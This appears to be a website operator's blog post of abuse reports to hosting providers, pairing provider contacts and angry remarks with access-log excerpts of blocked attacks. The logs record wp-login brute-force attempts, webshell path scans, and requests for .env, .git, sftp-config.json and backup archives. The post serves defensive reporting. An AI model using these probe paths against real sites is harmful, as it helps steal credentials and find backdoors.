AS16276 – OVH SAS – OVH AGAIN AND AGAIN EVERY DAY!!!
abuse@ovh.net
51.89.3.212 website*x.com – – [27/Jul/2025:09:03:57 +0200] „GET /images/images/cache.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.3.212 website*x.com – – [27/Jul/2025:09:03:58 +0200] „GET /wp-content/themes/twentystd/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 2

AS4694 – IDC Frontier Inc. – THIS PENETRANT SummalyBot IS VERY UNWANTED! IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hostmaster@nic.ad.jp,sindresorhus@gmail.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
210.236.251.27 www.website*x.de – – [27/Jul/2025:02:01:34 +0200] „HEAD /fensterX/X HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; SummalyBot/5.2.1-io.2)“
210.236.251.27 www.website*x.de – – [27/Jul/2025:02:01:35 +0200] „GET /fensterX/X HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; SummalyBot/5.2.1-io.2)“

ABUSE-MAIL NR. 3

AS401116 – Nybula LLC – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
196.251.118.216 website*x.com – – [27/Jul/2025:03:05:55 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

AS48693 – Rices Privately owned enterprise – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ntup.net,abuse@demenin.net,dem@demenin.net – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
194.145.227.125 website*x.com – – [27/Jul/2025:03:11:20 +0200] „GET /administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

ABUSE-MAIL NR. 4

AS56380 – “IT FRUIT“ S.R.L. – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vmbox.cloud,terletskydboss@gmail.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
185.153.199.135 website*x.com – – [27/Jul/2025:06:02:55 +0200] „GET /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

ABUSE-MAIL NR. 5

AS56380 – “IT FRUIT“ S.R.L. – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vmbox.cloud,terletskydboss@gmail.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
185.153.199.135 website*x.com – – [27/Jul/2025:06:59:22 +0200] „GET /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

ABUSE-MAIL NR. 6

AS49981 – WorldStream – THE NETWORK 2a00:7c80::/32 IS NOW BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@worldstream.nl
2a00:7c80:0:11e::12 website*x.com – – [27/Jul/2025:07:12:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

AS22612 – Namecheap, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@namecheaphosting.com
67.223.119.66 website*x.com – – [27/Jul/2025:11:53:22 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

AS19871 – Network Solutions, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com,eig-net-team@endurance.com
50.6.153.28 website*x.com – – [27/Jul/2025:11:58:00 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS26496 – GoDaddy.com, LLC – – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! – – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
abuse@godaddy.com, support@godaddy.com, contact@godaddy.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
184.168.114.3 website*x.com – – [27/Jul/2025:12:02:49 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“

ABUSE-MAIL NR. 7

AS396982 – Google LLC – GOOGLE EVERY DAY AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:07 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:08 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:08 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [27/Jul/2025:09:17:08 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

AS40021 – Contabo Inc. – VERY IGNORANT, DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
194.238.27.120 website*x.com – – [27/Jul/2025:10:15:04 +0200] „GET /doiconvs.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
194.238.27.120 website*x.com – – [27/Jul/2025:10:15:41 +0200] „GET /moddofuns.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
194.238.27.120 website*x.com – – [27/Jul/2025:10:16:05 +0200] „GET /memberfuns.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
194.238.27.120 website*x.com – – [27/Jul/2025:10:16:40 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
194.238.27.120 website*x.com – – [27/Jul/2025:10:17:12 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS132241 – SKSA TECHNOLOGY SDN BHD – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@internet-webhosting.com,noc@internet-webhosting.com
103.8.27.27 website*x.com – – [27/Jul/2025:11:59:22 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [27/Jul/2025:11:59:22 +0200] „GET /laravel/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [27/Jul/2025:11:59:22 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [27/Jul/2025:11:59:22 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“

ABUSE-MAIL NR. 8

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:11 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:11 +0200] „GET /wp-includes/assets/index.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:11 +0200] „GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:12 +0200] „GET /wp-content/packed.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:12 +0200] „GET /wp-includes/js/codemirror/about.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:12 +0200] „GET /wp-content/upgrade/wp-sigunq.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:12 +0200] „GET /wp-content/uploads/chosen.php HTTP/1.0“ 403 – „-“ „-“
172.192.37.219 website*x.de – – [27/Jul/2025:07:48:13 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „-“
… and so on….

ABUSE-MAIL NR. 9

AS26042 – FiberState, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cogentco.com
38.46.220.226 website*x.com – – [27/Jul/2025:12:07:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

AS140815 – HTTVSERVER TECHNOLOGY COMPANY LIMITED – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hm-changed@vnnic.vn,network.gtsvn@gmail.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
113.192.8.160 website*x.com – – [27/Jul/2025:12:12:38 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS63023 – GTHost – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@globaltelehost.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
38.91.101.159 website*x.com – – [27/Jul/2025:12:17:34 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

AS36352 – HostPapa – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hostmaster@centriohost.com,noc-admin@zelt.ae
172.245.155.10 website*x.com – – [27/Jul/2025:12:22:35 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“

ABUSE-MAIL NR. 10

AS8860 – Delta HighTech Ltd. – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@delta.bg – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
2a02:80e0:3::2 website*x.com – – [27/Jul/2025:12:27:33 +0200] „POST /wp-login.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“

AS16276 – OVH SAS – OVH AGAIN AND AGAIN EVERY DAY!!!
abuse@ovh.net
2402:1f00:8000:800::2903 website*x.com – – [27/Jul/2025:12:32:26 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS32475 – Internap Holding LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@horizoniq.com,mdavis@inap.com
23.92.177.29 website*x.com – – [27/Jul/2025:12:37:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

AS35916 – MULTACOM CORPORATION – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@multacom.com
2607:f130:0:103:ff:ff:f02c:3079 website*x.com – – [27/Jul/2025:12:42:08 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“

ABUSE-MAIL NR. 11

AS12876 – SCALEWAY S.A.S. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@scaleway.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – VERY IGNORANT!!!
163.172.187.89 website*x.com – – [27/Jul/2025:12:46:55 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“

AS35206 – NovaTrend Services GmbH – SEHR VORBILDLICHER PROVIDER! HAT SOFORT GEANTWORTET, SOFORT REAGIERT!
abuse@novatrend.ch
194.150.248.202 website*x.com – – [27/Jul/2025:12:51:45 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER ABOUT ABUSE-MAIL! GIVES ALWAYS FEEDBACK!
abuse@amazonaws.com, trustandsafety@support.aws.com
2a05:d01c:6fa:4600:ec48:6763:d328:d75e website*x.com – – [27/Jul/2025:12:56:28 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

AS19318 – Interserver, Inc – AGAIN AND AGAIN THIS WEEKEND!!!
abusencc@interserver.net
173.225.104.114 website*x.com – – [27/Jul/2025:13:01:13 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

Nun schauen wir mal, wie die versch. Provider diesmal in Bezug auf sichere Webspaces, Server und Netwerke reagieren!

Protokoll-Auszüge ab 18.07.25 – Was war so am Wochenende los?

Sämtliche Versuche, Website-Hacking, Referrer-Spam, Kopierversuche (auch Bilder mit Copyright!) und etc. sind an sämtliche, MIT VERANTWORTLICHE PROVIDER auch bemeldet worden. Insgesamt 27 MELDUNGEN an im Schnitt 3 Provider gleichzeitig!

Das geht bei uns Ratzfats, kaum Arbeit, Haha! Reihenfolge (oft an mehrere Provider in einer Abuse-Meldung, so sieht auch die Konkurrenz, wie unsicher andere Netze sind!):

Meldungs-Nummer
Alle Empfänger pro Meldung
Provider ASN – Teilweise mit ANMERKUNG!
Email
Zugriffsversuch IP, Website*X, Datum und Uhrzeit, Aktion, ggf. Quelle/Verweis, Agent

Hier nun die Protokoll-Auszüge ab dem 18.07.25:

MAIL NR. 1 TODAY!
abuse@convergeict.com,abuse-reports@cloudzy.com,abuse@infomaniak.ch,bucklog@proton.me
4 PROVIDER!
AS17639 – Converge ICT Solutions Inc.
abuse@convergeict.com
136.158.27.179 website*x.com – – [18/Jul/2025:15:32:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS14956 – RouterHosting LLC – HERE WITH 2 IP´S! AGAIN AND AGAIN! STOP THIS NOW!!!
abuse-reports@cloudzy.com
2602:fa59:10:681::1 website*x.com – – [18/Jul/2025:19:06:45 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:10:681::1 website*x.com – – [18/Jul/2025:19:07:11 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:10:681::1 website*x.com – – [18/Jul/2025:19:08:06 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
+
2602:fa59:9:7ad::1 website*x.com – – [20/Jul/2025:08:51:33 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:7ad::1 website*x.com – – [20/Jul/2025:08:52:16 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:7ad::1 website*x.com – – [20/Jul/2025:08:53:21 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS29222 – Infomaniak Network SA
abuse@infomaniak.ch
2001:1600:4:11::44e website*x.com – – [18/Jul/2025:22:34:53 +0200] „GET /sftp.json HTTP/1.0“ 403 – „-“ „http://Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36“
2001:1600:4:11::44e website*x.com – – [18/Jul/2025:22:34:53 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „http://Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 TheWorld 6“
2001:1600:4:11::44e website*x.com – – [18/Jul/2025:22:34:53 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „http://Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NP02; rv:11.0) like Gecko“
2001:1600:4:11::44e website*x.com – – [18/Jul/2025:22:34:53 +0200] „GET /.vscode/ftp-sync.json HTTP/1.0“ 403 – „-“ „http://Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 LBBROWSER“
AS211590 – Bucklog SARL – BUCKLOG AGAIN AND AGAIN! NO ANSWER,NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
bucklog@proton.me
185.177.72.7 website*x.com – – [19/Jul/2025:08:14:16 +0200] „GET /.git/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.7 website*x.com – – [19/Jul/2025:08:14:19 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.7 website*x.com – – [19/Jul/2025:08:14:25 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.7 website*x.com – – [19/Jul/2025:08:14:25 +0200] „GET /.git/index HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.7 website*x.com – – [19/Jul/2025:08:14:26 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

–

MAIL NR. 2 TODAY!
abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,google-cloud-compliance@google.com, network-abuse@google.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
AS141995 – Contabo Asia Private Limited – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /backup.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /websites.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /website.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /app.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /db_backup.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /assets.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /lib.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /main.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:29 +0200] „GET /theme.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /vendor.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /support.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /db.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /api.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /src.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:30 +0200] „GET /s3.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:31 +0200] „GET /api.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
